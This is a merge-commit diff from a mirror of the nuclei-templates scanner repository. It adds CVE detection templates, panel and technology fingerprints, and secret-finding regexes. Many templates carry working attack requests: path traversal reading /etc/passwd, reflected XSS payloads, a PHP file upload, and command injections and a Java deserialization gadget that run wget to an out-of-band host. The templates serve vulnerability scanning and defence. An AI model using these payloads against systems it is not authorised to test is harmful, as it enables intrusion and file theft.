daffainfo
/
nuclei-templates
mirror of https://github.com/daffainfo/nuclei-templates.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity

Merge branch 'master' of https://github.com/projectdiscovery/nuclei-templates

patch-1
Noam Rathaus 2021-08-01 08:49:45 +03:00
parent ecb026ef47 bc48231304
commit a4e9469544
59 changed files with 2084 additions and 706 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

4
CONTRIBUTING.md
View File

@ -94,4 +94,6 @@ You can refer to the following articles of Git and GitHub basics. In case you ar
## Tip from us😇
**Nuclei** outcomes are only as excellent as **template matchers💡**
- **Nuclei** outcomes are only as excellent as **template matchers💡**
- Declare at least two matchers to reduce false positive
- Avoid matching words reflected in the URL to reduce false positive

27
cves/2009/CVE-2009-5114.yaml Normal file
View File

@ -0,0 +1,27 @@
id: CVE-2009-5114
info:
name: WebGlimpse 2.18.7 - Directory Traversal
author: daffainfo
severity: high
description: Directory traversal vulnerability in wgarcmin.cgi in WebGlimpse 2.18.7 and earlier allows remote attackers to read arbitrary files via a .. (dot dot) in the DOC parameter.
reference: |
- https://www.exploit-db.com/exploits/36994
- https://www.cvedetails.com/cve/CVE-2009-5114
tags: cve,cve2009,lfi
requests:
- method: GET
path:
- "{{BaseURL}}/wgarcmin.cgi?NEXTPAGE=D&ID=1&DOC=../../../../etc/passwd"
matchers-condition: and
matchers:
- type: regex
regex:
- "root:.*:0:0"
- type: status
status:
- 200

27
cves/2012/CVE-2012-0991.yaml Normal file
View File

@ -0,0 +1,27 @@
id: CVE-2012-0991
info:
name: OpenEMR 4.1 - Local File Inclusion
author: daffainfo
severity: high
description: Multiple directory traversal vulnerabilities in OpenEMR 4.1.0 allow remote authenticated users to read arbitrary files via a .. (dot dot) in the formname parameter to (1) contrib/acog/print_form.php; or (2) load_form.php, (3) view_form.php, or (4) trend_form.php in interface/patient_file/encounter.
reference: |
- https://www.exploit-db.com/exploits/36650
- https://www.cvedetails.com/cve/CVE-2012-0991
tags: cve,cve2012,lfi,openemr
requests:
- method: GET
path:
- "{{BaseURL}}/contrib/acog/print_form.php?formname=../../../etc/passwd%00"
matchers-condition: and
matchers:
- type: regex
regex:
- "root:.*:0:0"
- type: status
status:
- 200

31
cves/2014/CVE-2014-4535.yaml Normal file
View File

@ -0,0 +1,31 @@
id: CVE-2014-4535
info:
name: Import Legacy Media <= 0.1 - Unauthenticated Reflected Cross-Site Scripting (XSS)
author: daffainfo
severity: medium
reference: |
- https://wpscan.com/vulnerability/7fb78d3c-f784-4630-ad92-d33e5de814fd
- https://nvd.nist.gov/vuln/detail/CVE-2014-4535
tags: cve,cve2014,wordpress,wp-plugin,xss
requests:
- method: GET
path:
- "{{BaseURL}}/wp-content/plugins/importlegacymedia/getid3/demos/demo.mimeonly.php?filename=filename%27%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"
matchers-condition: and
matchers:
- type: word
words:
- "'></script><script>alert(document.domain)</script>"
part: body
- type: word
part: header
words:
- text/html
- type: status
status:
- 200

31
cves/2014/CVE-2014-4536.yaml Normal file
View File

@ -0,0 +1,31 @@
id: CVE-2014-4536
info:
name: Infusionsoft Gravity Forms Add-on < 1.5.7 - Unauthenticated Reflected XSS
author: daffainfo
severity: medium
reference: |
- https://wpscan.com/vulnerability/f048b5cc-5379-4c19-9a43-cd8c49c8129f
- https://nvd.nist.gov/vuln/detail/CVE-2014-4536
tags: cve,cve2014,wordpress,wp-plugin,xss
requests:
- method: GET
path:
- "{{BaseURL}}/wp-content/plugins/infusionsoft/Infusionsoft/tests/notAuto_test_ContactService_pauseCampaign.php?go=go%22%3E%3Cscript%3Ealert%28document.cookie%29%3C/script%3E&contactId=contactId%27%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&campaignId=campaignId%22%3E%3Cscript%3Ealert%28document.cookie%29%3C/script%3E&"
matchers-condition: and
matchers:
- type: word
words:
- '"></script><script>alert(document.domain)</script>'
part: body
- type: word
part: header
words:
- text/html
- type: status
status:
- 200

27
cves/2015/CVE-2015-3648.yaml Normal file
View File

@ -0,0 +1,27 @@
id: CVE-2015-3648
info:
name: ResourceSpace - Local File inclusion
author: pikpikcu
severity: high
description: ResourceSpace is prone to a local file-include vulnerability because it fails to sufficiently sanitize user-supplied input.
reference: |
- https://vulners.com/cve/CVE-2015-3648/
- https://www.securityfocus.com/bid/75019
tags: cve,cve2015,lfi,resourcespace
requests:
- method: GET
path:
- "{{BaseURL}/pages/setup.php?defaultlanguage=..%2f..%2f..%2f..%2f..%2fetc%2fpasswd"
matchers-condition: and
matchers:
- type: regex
regex:
- "root:.*:0:0:"
- type: status
status:
- 200

31
cves/2015/CVE-2015-6544.yaml Normal file
View File

@ -0,0 +1,31 @@
id: CVE-2015-6544
info:
name: iTop XSS
author: pikpikcu
severity: medium
description: |
Cross-site scripting (XSS) vulnerability in application/dashboard.class.inc.php in Combodo iTop before 2.2.0-2459 allows remote attackers to inject arbitrary web script or HTML via a dashboard title.
reference: https://nvd.nist.gov/vuln/detail/CVE-2015-6544
tags: cve,cve2015,xss,itop
requests:
- method: GET
path:
- "{{BaseURL}}/pages/ajax.render.php?operation=render_dashboard&dashboard_id=1&layout_class=DashboardLayoutOneCol&title=%%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"
matchers-condition: and
matchers:
- type: word
words:
- '</script><script>alert(document.domain)</script>'
part: body
- type: status
status:
- 200
- type: word
part: header
words:
- text/html

30
cves/2015/CVE-2015-8349.yaml Normal file
View File

@ -0,0 +1,30 @@
id: CVE-2015-8349
info:
name: SourceBans XSS
author: pikpikcu
severity: medium
description: Cross-site scripting (XSS) vulnerability in SourceBans before 2.0 pre-alpha allows remote attackers to inject arbitrary web script or HTML via the advSearch parameter to index.php.
reference: https://nvd.nist.gov/vuln/detail/CVE-2015-8349
tags: cve,cve2015,xss,sourcebans
requests:
- method: GET
path:
- "{{BaseURL}}/index.php?p=banlist&advSearch=0%27%22%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&advType=btype"
matchers-condition: and
matchers:
- type: word
words:
- '</script><script>alert(document.domain)</script>'
part: body
- type: status
status:
- 200
- type: word
part: header
words:
- text/

31
cves/2016/CVE-2016-7981.yaml Normal file
View File

@ -0,0 +1,31 @@
id: CVE-2016-7981
info:
name: SPIP 3.1.2 XSS
author: pikpikcu
severity: medium
description: |
Cross-site scripting (XSS) vulnerability in valider_xml.php in SPIP 3.1.2 and earlier allows remote attackers to inject arbitrary web script or HTML via the var_url parameter in a valider_xml action.
reference: https://nvd.nist.gov/vuln/detail/CVE-2016-7981
tags: cve,cve2016,xss,spip
requests:
- method: GET
path:
- "{{BaseURL}}/ecrire/?exec=valider_xml&var_url=%22%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"
matchers-condition: and
matchers:
- type: word
words:
- '"></script><script>alert(document.domain)</script>'
part: body
- type: status
status:
- 200
- type: word
part: header
words:
- text/html

27
cves/2017/CVE-2017-15647.yaml Normal file
View File

@ -0,0 +1,27 @@
id: CVE-2017-15647
info:
name: FiberHome - Directory Traversal
author: daffainfo
severity: medium
description: On FiberHome routers, Directory Traversal exists in /cgi-bin/webproc via the getpage parameter in conjunction with a crafted var:page value.
reference: |
- https://www.exploit-db.com/exploits/44054
- https://www.cvedetails.com/cve/CVE-2017-15647
tags: cve,cve2017,lfi,router
requests:
- method: GET
path:
- "{{BaseURL}}/cgi-bin/webproc?getpage=/etc/passwd&var:language=en_us&var:page=wizardfifth"
matchers-condition: and
matchers:
- type: regex
regex:
- "root:.*:0:0"
- type: status
status:
- 200

38
cves/2017/CVE-2017-6090.yaml Normal file
View File

@ -0,0 +1,38 @@
id: CVE-2017-6090
info:
name: PhpCollab (unauthenticated) Arbitrary File Upload
author: pikpikcu
severity: critical
tags: cve,cve2017,phpcollab,rce,fileupload
reference: https://nvd.nist.gov/vuln/detail/CVE-2017-6090
requests:
- raw:
- | # REQUEST 1
POST /clients/editclient.php?id={{randstr}}&action=update HTTP/1.1
Host: {{Hostname}}
Content-Type: multipart/form-data; boundary=---------------------------154934846911423734231554128137
-----------------------------154934846911423734231554128137
Content-Disposition: form-data; name="upload"; filename="{{randstr}}.php"
Content-Type: application/x-php
<?php echo md5('phpcollab_rce');?>
-----------------------------154934846911423734231554128137--
- | # REQUEST 2
GET /logos_clients/1.php HTTP/1.1
Host: {{Hostname}}
matchers-condition: and
matchers:
- type: word
part: body
words:
- "48dbd2384cb6b996fa1e2855c7f0567f"
- type: status
status:
- 200

42
cves/2018/CVE-2018-10818.yaml Normal file
View File

@ -0,0 +1,42 @@
id: CVE-201810818
info:
name: LG NAS Devices - Remote Code Execution (Unauthenticated)
author: gy741
severity: critical
description: The vulnerability (CVE-2018-10818) is a pre-auth remote command injection vulnerability found in the majority of LG NAS devices. You cannot simply log in with any random username and password. However, there lies a command injection vulnerability in the “password” parameter.
reference: |
- https://www.vpnmentor.com/blog/critical-vulnerability-found-majority-lg-nas-devices/
- https://medium.com/@0x616163/lg-n1a1-unauthenticated-remote-command-injection-cve-2018-14839-9d2cf760e247
tags: cve,cve2018,lg-nas,rce,oob
requests:
- raw:
- |
POST /system/sharedir.php HTTP/1.1
Host: {{Hostname}}
User-Agent: curl/7.58.0
Accept: */*
Content-Type: application/x-www-form-urlencoded
&uid=10; wget http://{{interactsh-url}}
- |
POST /en/php/usb_sync.php HTTP/1.1
Host: {{Hostname}}
User-Agent: curl/7.58.0
Accept: */*
Content-Type: application/x-www-form-urlencoded
&act=sync&task_number=1;wget http://{{interactsh-url}}
matchers-condition: and
matchers:
- type: word
part: interactsh_protocol # Confirms the HTTP Interaction
words:
- "http"
- type: status
status:
- 200

29
cves/2019/CVE-2019-12276.yaml Normal file
View File

@ -0,0 +1,29 @@
id: CVE-2019-12276
info:
name: GrandNode 4.40 - Path Traversal
author: daffainfo
severity: high
description: Path Traversal vulnerability in Controllers/LetsEncryptController.cs in LetsEncryptController in GrandNode 4.40 allows remote, unauthenticated attackers to retrieve arbitrary files on the web server via specially crafted LetsEncrypt/Index?fileName= HTTP requests. A patch for this issue was made on 2019-05-30 in GrandNode 4.40.
reference: |
- https://security401.com/grandnode-path-traversal/
- https://www.cvedetails.com/cve/CVE-2019-12276
tags: cve,cve2019,lfi
requests:
- method: GET
path:
- "{{BaseURL}}/LetsEncrypt/Index?fileName=/etc/passwd"
headers:
Connection: close
matchers-condition: and
matchers:
- type: regex
regex:
- "root:.*:0:0"
- type: status
status:
- 200

27
cves/2019/CVE-2019-14312.yaml Normal file
View File

@ -0,0 +1,27 @@
id: CVE-2019-14312
info:
name: Aptana Jaxer 1.0.3.4547 - Local File inclusion
author: daffainfo
severity: high
description: Aptana Jaxer 1.0.3.4547 is vulnerable to a local file inclusion vulnerability in the wikilite source code viewer. This vulnerability allows a remote attacker to read internal files on the server via a tools/sourceViewer/index.html?filename=../ URI.
reference: |
- https://www.exploit-db.com/exploits/47214
- https://www.cvedetails.com/cve/CVE-2019-14312
tags: cve,cve2019,lfi
requests:
- method: GET
path:
- "{{BaseURL}}/tools/sourceViewer/index.html?filename=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd"
matchers-condition: and
matchers:
- type: regex
regex:
- "root:.*:0:0"
- type: status
status:
- 200

27
cves/2020/CVE-2020-11455.yaml Normal file
View File

@ -0,0 +1,27 @@
id: CVE-2020-11455
info:
name: LimeSurvey 4.1.11 - Path Traversal
author: daffainfo
severity: high
description: LimeSurvey before 4.1.12+200324 contains a path traversal vulnerability in application/controllers/admin/LimeSurveyFileManager.php.
reference: |
- https://www.exploit-db.com/exploits/48297
- https://www.cvedetails.com/cve/CVE-2020-11455
tags: cve,cve2020,lfi
requests:
- method: GET
path:
- "{{BaseURL}}/index.php/admin/filemanager/sa/getZipFile?path=/../../../../../../../etc/passwd"
matchers-condition: and
matchers:
- type: regex
regex:
- "root:.*:0:0"
- type: status
status:
- 200

2
cves/2020/CVE-2020-13927.yaml
View File

@ -3,7 +3,7 @@ id: CVE-2020-13927
info:
name: Unauthenticated Airflow Experimental REST API
author: pdteam
severity: medium
severity: critical
tags: cve,cve2020,apache,airflow,unauth
requests:

33
cves/2020/CVE-2020-26153.yaml Normal file
View File

@ -0,0 +1,33 @@
id: CVE-2020-26153
info:
name: Event Espresso Core-Reg XSS
author: pikpikcu
severity: medium
description: |
cross-site scripting (XSS) vulnerability in wp-content/plugins/event-espresso-core-reg/admin_pages/messages/templates/ee_msg_admin_overview.template.php in the Event Espresso Core plugin before 4.10.7.p for WordPress allows remote attackers to inject arbitrary web script or HTML via the page parameter.
reference: |
- https://labs.nettitude.com/blog/cve-2020-26153-event-espresso-core-cross-site-scripting/
- https://nvd.nist.gov/vuln/detail/CVE-2020-26153
tags: cve,cve2020,xss,wordpress,wp-plugin
requests:
- method: GET
path:
- "{{BaseURL}}/wp-content/plugins/event-espresso-core-reg/admin_pages/messages/templates/ee_msg_admin_overview.template.php?page=%22%2F%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E%3Cb"
matchers-condition: and
matchers:
- type: word
words:
- '"/></script><script>alert(document.domain)</script>'
part: body
- type: status
status:
- 500
- type: word
part: header
words:
- text/html

31
cves/2020/CVE-2020-27735.yaml Normal file
View File

@ -0,0 +1,31 @@
id: CVE-2020-27735
info:
name: Wing FTP's Web Interface XSS
author: pikpikcu
severity: medium
description: |
An XSS issue was discovered in Wing FTP 6.4.4. An arbitrary IFRAME element can be included in the help pages via a crafted link, leading to the execution of (sandboxed) arbitrary HTML and JavaScript in the user's browser.
reference: https://nvd.nist.gov/vuln/detail/CVE-2020-27735
tags: cve,cve2020,xss,wing-ftp
requests:
- method: GET
path:
- "{{BaseURL}}/help/english/index.html?javascript&#58;alert(document.domain)"
matchers-condition: and
matchers:
- type: word
words:
- '<frame name="hmcontent" src="javascript:alert(document.domain)" title="Content frame">'
part: body
- type: status
status:
- 200
- type: word
part: header
words:
- text/html

0
cves/2020/CVE 2020-6171.yaml → cves/2020/CVE-2020-6171.yaml
View File

31
cves/2020/CVE-2020-9036.yaml Normal file
View File

@ -0,0 +1,31 @@
id: CVE-2020-9036
info:
name: Jeedom through 4.0.38 allows XSS
author: pikpikcu
severity: medium
reference: |
- https://sysdream.com/news/lab/2020-08-05-cve-2020-9036-jeedom-xss-leading-to-remote-code-execution/
- https://nvd.nist.gov/vuln/detail/CVE-2020-9036
tags: cve,cve2020,xss,jeedom
requests:
- method: GET
path:
- "{{BaseURL}}/index.php?v=d&p=%22;alert(document.domain);%22"
matchers-condition: and
matchers:
- type: word
words:
- '<script>document.title = "";alert(document.domain);" - Jeedom"</script>'
part: body
- type: status
status:
- 200
- type: word
part: header
words:
- text/html

22
dns/dnssec-detection.yaml Normal file
View File

@ -0,0 +1,22 @@
id: dnssec-detection
info:
name: DNSSEC Detection
description: A template to check if Delegation of Signing (DS) record provides information about a signed zone file when DNSSEC enabled.
author: pdteam
severity: info
tags: dns,dnssec
reference: https://www.cyberciti.biz/faq/unix-linux-test-and-validate-dnssec-using-dig-command-line/
dns:
- name: "{{FQDN}}"
type: DS
class: inet
recursion: true
retries: 3
extractors:
- type: regex
group: 1
regex:
- "IN\tDS\t(.+)"

31
exposed-panels/camunda-login-panel.yaml Normal file
View File

@ -0,0 +1,31 @@
id: camunda-login-panel
info:
name: Camunda Login panel
author: alifathi-h1
severity: info
description: Default Credentials of demo:demo on Camunda application.
reference: https://docs.camunda.org/manual/7.15/webapps/admin/user-management/
tags: camunda,panel
requests:
- method: GET
path:
- '{{BaseURL}}/app/welcome/default/#!/login'
- '{{BaseURL}}/camunda/app/welcome/default/#!/login'
matchers-condition: and
matchers:
- type: word
words:
- "Camunda Welcome"
- type: status
status:
- 200
extractors:
- type: regex
part: body
group: 1
regex:
- '<footer cam-widget-footer version="v([0-9.]+)"'

26
exposed-panels/cerebro-panel.yaml Normal file
View File

@ -0,0 +1,26 @@
id: cerebro-panel
info:
name: Cerebro Panel
author: huowuzhao,elder tao
severity: high
reference: https://github.com/lmenezes/cerebro
tags: panel,cerebro
requests:
- method: GET
path:
- "{{BaseURL}}/login"
matchers:
- type: word
words:
- "<title>Cerebro</title>"
part: body
extractors:
- type: regex
part: body
group: 1
regex:
- "<small>([a-z0-9.]+)</small>"

30
exposed-panels/cisco-sendgrid.yaml Normal file
View File

@ -0,0 +1,30 @@
id: cisco-sendgrid
info:
name: Cisco ServiceGrid
author: dhiyaneshDK
severity: info
reference: https://www.shodan.io/search?query=http.title%3A%22Cisco+ServiceGrid%22
tags: panel,cisco
requests:
- method: GET
path:
- '{{BaseURL}}/pages/sdcall/Login.jsp'
matchers-condition: and
matchers:
- type: regex
regex:
- '(?m)^<title>Cisco ServiceGrid (.*)<\/title>$'
- type: status
status:
- 200
extractors:
- type: regex
part: body
group: 1
regex:
- '<div class="top\-margin">Version ([0-9.]+)<\/div>'

23
exposed-panels/clearpass-policy-manager.yaml Normal file
View File

@ -0,0 +1,23 @@
id: clearpass-policy-manager
info:
name: ClearPass Policy Manager - Aruba Networks
author: dhiyaneshDK
severity: info
reference: https://www.shodan.io/search?query=http.title%3A%22ClearPass+Policy+Manager+-+Aruba+Networks%22
tags: panel,aruba
requests:
- method: GET
path:
- '{{BaseURL}}/tips/tipsLogin.action'
matchers-condition: and
matchers:
- type: word
words:
- '<title>ClearPass Policy Manager - Aruba Networks</title>'
- type: status
status:
- 200

26
exposed-panels/dell-openmanager-login.yaml Normal file
View File

@ -0,0 +1,26 @@
id: dell-openmanager-login
info:
name: Dell OpenManage Switch Administrator
author: dhiyaneshDK
severity: info
reference: https://www.shodan.io/search?query=html%3A%22Dell+OpenManage+Switch+Administrator%22
tags: panel,dell
requests:
- method: GET
path:
- '{{BaseURL}}'
- '{{BaseURL}}/config/authentication_page.htm'
matchers-condition: or
matchers:
- type: word
words:
- '<title>Dell OpenManage Switch Administrator</title>'
- type: word
words:
- '<TITLE>Log In</TITLE>'
- 'device/logOff_up_menu1.htm'
condition: and

23
exposed-panels/f-secure-policy-manager.yaml Normal file
View File

@ -0,0 +1,23 @@
id: f-secure-policy-manager
info:
name: F-Secure Policy Manager Server
author: dhiyaneshDK
severity: info
reference: https://www.shodan.io/search?query=http.title%3A%22F-Secure+Policy+Manager+Server%22
tags: login,panel
requests:
- method: GET
path:
- '{{BaseURL}}'
matchers-condition: and
matchers:
- type: word
words:
- '<title>F-Secure Policy Manager Server</title>'
- type: status
status:
- 200

24
exposed-panels/glpi-authentication.yaml Normal file
View File

@ -0,0 +1,24 @@
id: glpi-authentication
info:
name: GLPI - Authentification
author: dhiyaneshDK
severity: info
reference: https://www.shodan.io/search?query=http.title%3A%22GLPI+-+Authentification%22
tags: panel,auth
requests:
- method: GET
path:
- '{{BaseURL}}'
matchers-condition: and
matchers:
- type: word
words:
- '<title>GLPI - Authentication</title>'
- 'title="Powered by Teclib and contributors" class="copyright">GLPI Copyright'
- type: status
status:
- 200

23
exposed-panels/gxd5-pacs-connexion-utilisateur.yaml Normal file
View File

@ -0,0 +1,23 @@
id: gxd5-pacs-connexion-utilisateur
info:
name: GXD5 Pacs Connexion utilisateur
author: dhiyaneshDK
severity: info
reference: https://www.shodan.io/search?query=http.title%3A%22GXD5+Pacs+Connexion+utilisateur%22
tags: panel,login
requests:
- method: GET
path:
- '{{BaseURL}}'
matchers-condition: and
matchers:
- type: word
words:
- '<title>GXD5 Pacs Connexion utilisateur</title>'
- type: status
status:
- 200

20
exposed-panels/identity-services-engine.yaml Normal file
View File

@ -0,0 +1,20 @@
id: identity-services-engine
info:
name: Identity Services Engine
author: dhiyaneshDK
severity: info
reference: https://www.shodan.io/search?query=http.title%3A%22Identity+Services+Engine%22
tags: panel
requests:
- method: GET
path:
- '{{BaseURL}}'
- '{{BaseURL}}/admin/'
matchers-condition: and
matchers:
- type: word
words:
- '<title>Identity Services Engine</title>'

30
exposed-panels/sgp-login-panel.yaml Normal file
View File

@ -0,0 +1,30 @@
id: sgp-login-panel
info:
name: SGP Panel
author: dhiyaneshDK
severity: info
reference: https://www.shodan.io/search?query=http.title%3A%22SGP%22
tags: panel,sgp
requests:
- method: GET
path:
- '{{BaseURL}}/accounts/login?next=/admin/'
matchers-condition: and
matchers:
- type: word
words:
- '<title>SGP</title>'
- type: status
status:
- 200
extractors:
- type: regex
part: body
group: 1
regex:
- ">Ver\\. ([0-9.A-Z]+)</p>"

23
exposed-panels/xvr-login.yaml Normal file
View File

@ -0,0 +1,23 @@
id: xvr-login
info:
name: XVR LOGIN
author: dhiyaneshDK
severity: info
reference: https://www.shodan.io/search?query=http.title%3A%22XVR+LOGIN%22
tags: panel,xvr
requests:
- method: GET
path:
- '{{BaseURL}}/login.rsp'
matchers-condition: and
matchers:
- type: word
words:
- '<title>XVR LOGIN</title>'
- type: status
status:
- 200

4
exposures/configs/appsec-yml-disclosure.yaml → exposures/configs/appspec-yml-disclosure.yaml
View File

@ -1,7 +1,7 @@
id: appsec-yml-disclosure
id: appspec-yml-disclosure
info:
name: Appsec Yml Disclosure
name: Appspec Yml Disclosure
author: dhiyaneshDk
severity: medium
reference: https://github.com/detectify/ugly-duckling/blob/master/modules/crowdsourced/appsec-yml-disclosure.json

13
exposures/configs/git-config.yaml
View File

@ -8,16 +8,9 @@ info:
tags: config,git,exposure
requests:
- raw:
- |
GET /.git/config HTTP/1.1
Host: {{Hostname}}
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:71.0) Gecko/20100101 Firefox/71.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Content-Type: application/x-www-form-urlencoded
Content-Length: 1
Connection: close
- method: GET
path:
- "{{BaseURL}}/.git/config"
matchers-condition: and
matchers:

32
exposures/files/github-gemfile-files.yaml Normal file
View File

@ -0,0 +1,32 @@
id: github-gemfile-files
info:
name: Github Gemfiles
author: hahwul
severity: info
description: Find github page files(Gemfile / Gemfile.lock)
tags: github,exposure
requests:
- method: GET
path:
- "{{BaseURL}}/Gemfile"
- "{{BaseURL}}/Gemfile.lock"
matchers-condition: or
matchers:
- type: dsl
dsl:
- 'contains(body, "https://rubygems.org")'
- 'contains(body, "source")'
- 'contains(body, "gem")'
- 'status_code == 200'
condition: and
- type: dsl
dsl:
- 'contains(body, "https://rubygems.org")'
- 'contains(body, "remote")'
- 'contains(body, "specs")'
- 'status_code == 200'
condition: and

26
exposures/files/github-page-config.yaml Normal file
View File

@ -0,0 +1,26 @@
id: github-page-config
info:
name: Github pages config file
author: hahwul
severity: info
description: Find github pages config file.
tags: github,exposure
requests:
- method: GET
path:
- "{{BaseURL}}/_config.yml"
matchers-condition: and
matchers:
- type: status
status:
- 200
- type: word
words:
- "jekyll"
- "title"
- "baseurl"
condition: and

1375
exposures/tokens/generic/credentials-disclosure.yaml
View File

File diff suppressed because it is too large Load Diff

16
file/keys/github-personal-token.yaml Normal file
View File

@ -0,0 +1,16 @@
id: github-personal-token
info:
name: Github Personal Token
author: geeknik
severity: high
tags: token,file
file:
- extensions:
- all
extractors:
- type: regex
regex:
- "ghp_.{36}"

4
file/keys/private-key.yaml
View File

@ -2,7 +2,7 @@ id: private-key
info:
name: Private Key Detect
author: gaurang
author: gaurang,geeknik
severity: high
tags: token,file
@ -20,3 +20,5 @@ file:
- "\"BEGIN EC PRIVATE KEY\""
- "\"BEGIN PGP PRIVATE KEY BLOCK\""
- "\"ssh-rsa\""
- "\"ssh-dsa\""
- "\"ssh-ed25519\""

42
iot/qvisdvr-deserialization-rce.yaml Normal file
View File

@ -0,0 +1,42 @@
id: qvisdvr-deserialization-rce
info:
author: me9187
name: QVISDVR JSF Deserialization - Remote Code Execution
severity: critical
reference: https://twitter.com/Me9187/status/1414606876575162373
tags: qvisdvr,rce,deserialization,jsf,iot
requests:
- raw:
- |
GET /qvisdvr/ HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
- |
POST /qvisdvr/index.faces;jsessionid={{token}} HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
javax.faces.ViewState={{generate_java_gadget("commons-collections3.1", "wget http://{{interactsh-url}}", "base64")}}
extractors:
- type: regex
name: token
group: 1
internal: true
part: header
regex:
- "JSESSIONID=(.*)"
matchers-condition: and
matchers:
- type: status
status:
- 500
- type: word
part: interactsh_protocol
words:
- http

31
misconfiguration/akamai-arl-xss.yaml Normal file
View File

@ -0,0 +1,31 @@
id: akamai-arl-xss
info:
name: Open Akamai ARL XSS
author: pdteam
severity: medium
tags: akamai,xss
reference: |
- https://github.com/war-and-code/akamai-arl-hack
- https://twitter.com/SpiderSec/status/1421176297548435459
- https://warandcode.com/post/akamai-arl-hack/
- https://github.com/cybercdh/goarl
- https://community.akamai.com/customers/s/article/WebPerformanceV1V2ARLChangeStartingFebruary282021?language=en_US
requests:
- method: GET
path:
- "{{BaseURL}}/7/0/33/1d/www.citysearch.com/search?what=x&where=place%22%3E%3Csvg+onload=confirm(document.domain)%3E"
matchers-condition: and
matchers:
- type: word
condition: and
words:
- '"><svg onload=confirm(document.domain)>'
- 'Suggestions for improving the results'
- type: word
part: header
words:
- 'text/html'

23
misconfiguration/android-debug-database-exposed.yaml Normal file
View File

@ -0,0 +1,23 @@
id: android-debug-database-exposed
info:
name: Android Debug Manager
author: dhiyaneshDK
severity: low
reference: https://www.shodan.io/search?query=http.title%3A%22Android+Debug+Database%22
tags: unauth,android
requests:
- method: GET
path:
- "{{BaseURL}}"
matchers-condition: and
matchers:
- type: word
words:
- '<title>Android Debug Database</title>'
- type: status
status:
- 200

23
misconfiguration/viewpoint-system-status.yaml Normal file
View File

@ -0,0 +1,23 @@
id: viewpoint-system-status
info:
name: ViewPoint System Status
author: dhiyaneshDK
severity: low
reference: https://www.shodan.io/search?query=http.title%3A%22ViewPoint+System+Status%22
tags: status,exposures
requests:
- method: GET
path:
- '{{BaseURL}}'
matchers-condition: and
matchers:
- type: word
words:
- '<title>ViewPoint System Status</title>'
- type: status
status:
- 200

26
misconfiguration/zabbix-dashboards-access.yaml Normal file
View File

@ -0,0 +1,26 @@
id: zabbix-dashboards-access
info:
name: zabbix-dashboards-access
author: pussycat0x
severity: medium
description: View dashboard with guest login.
reference: https://www.exploit-db.com/ghdb/5595
tags: zabbix,unauth
requests:
- method: GET
path:
- "{{BaseURL}}/zabbix/zabbix.php?action=dashboard.list"
matchers-condition: and
matchers:
- type: word
words:
- "Create dashboard"
- "Zabbix SIA"
condition: and
- type: status
status:
- 200

24
technologies/bigbluebutton-detect.yaml Normal file
View File

@ -0,0 +1,24 @@
id: bigbluebutton-detect
info:
name: BigBlueButton Detect
author: pikpikcu
severity: info
tags: tech,bigbluebutton
requests:
- method: GET
path:
- "{{BaseURL}}/"
matchers-condition: and
matchers:
- type: word
part: body
words:
- "<title>BigBlueButton</title>"
- type: status
status:
- 200

24
technologies/centreon-detect.yaml Normal file
View File

@ -0,0 +1,24 @@
id: centreon-detect
info:
name: Centreon Detect
author: pikpikcu
severity: info
tags: tech,centreon
requests:
- method: GET
path:
- "{{BaseURL}}/centreon/index.php"
matchers-condition: and
matchers:
- type: word
part: body
words:
- "<title>Centreon - IT & Network Monitoring</title>"
- type: status
status:
- 200

24
technologies/gespage-detect.yaml Normal file
View File

@ -0,0 +1,24 @@
id: gespage-detect
info:
name: Gespage Detect
author: pikpikcu
severity: info
tags: tech,gespage
requests:
- method: GET
path:
- "{{BaseURL}}/gespage/webapp/login.xhtml"
matchers-condition: and
matchers:
- type: word
part: body
words:
- "<title>Login utilisateur Gespage</title>"
- type: status
status:
- 200

22
technologies/getsimple-cms-detector.yaml Normal file
View File

@ -0,0 +1,22 @@
id: getsimple-cms-detector
info:
name: GetSimple CMS Detector
author: philippedelteil
severity: info
description: With this template we can detect a running GetSimple CMS instance
tags: getsimple,tech
requests:
- method: GET
path:
- "{{BaseURL}}/readme.txt"
matchers-condition: and
matchers:
- type: word
part: body
words:
- 'GetSimple CMS is a flatfile CMS'
- type: status
part: header
status:
- 200

24
technologies/itop-detect.yaml Normal file
View File

@ -0,0 +1,24 @@
id: itop-detect
info:
name: iTop Detect
author: pikpikcu
severity: info
tags: tech,itop
requests:
- method: GET
path:
- "{{BaseURL}}/pages/UI.php"
matchers-condition: and
matchers:
- type: word
part: body
words:
- "<title>iTop login</title>"
- type: status
status:
- 200

24
technologies/jeedom-detect.yaml Normal file
View File

@ -0,0 +1,24 @@
id: jeedom-detect
info:
name: Jeedom Detect
author: pikpikcu
severity: info
tags: tech,jeedom
requests:
- method: GET
path:
- "{{BaseURL}}/index.php?v=d"
matchers-condition: and
matchers:
- type: word
part: body
words:
- "<title>Jeedom</title>"
- type: status
status:
- 200

29
technologies/jenkins-detect.yaml Normal file
View File

@ -0,0 +1,29 @@
id: jenkins-detect
info:
name: Jenkins detect (version)
author: philippdelteil
severity: info
tags: tech,jenkins
requests:
- method: GET
path:
- "{{BaseURL}}"
matchers-condition: and
matchers:
- type: word
words:
- "X-Jenkins"
part: header
- type: word
words:
- "<title>Sign in [Jenkins]</title>"
part: body
extractors:
- type: kval
part: header
kval:
- x_jenkins

29
technologies/openx-detect.yaml Normal file
View File

@ -0,0 +1,29 @@
id: openx-detect
info:
name: OpenX detect
author: pikpikcu
severity: info
tags: tech,openx
requests:
- method: GET
path:
- "{{BaseURL}}/www/admin/"
matchers:
- type: regex
part: body
regex:
- '<title>OpenX</title>'
- type: status
status:
- 200
extractors:
- type: regex
part: body
group: 1
regex:
- 'content="(.*)- http://www.openx.org">'

23
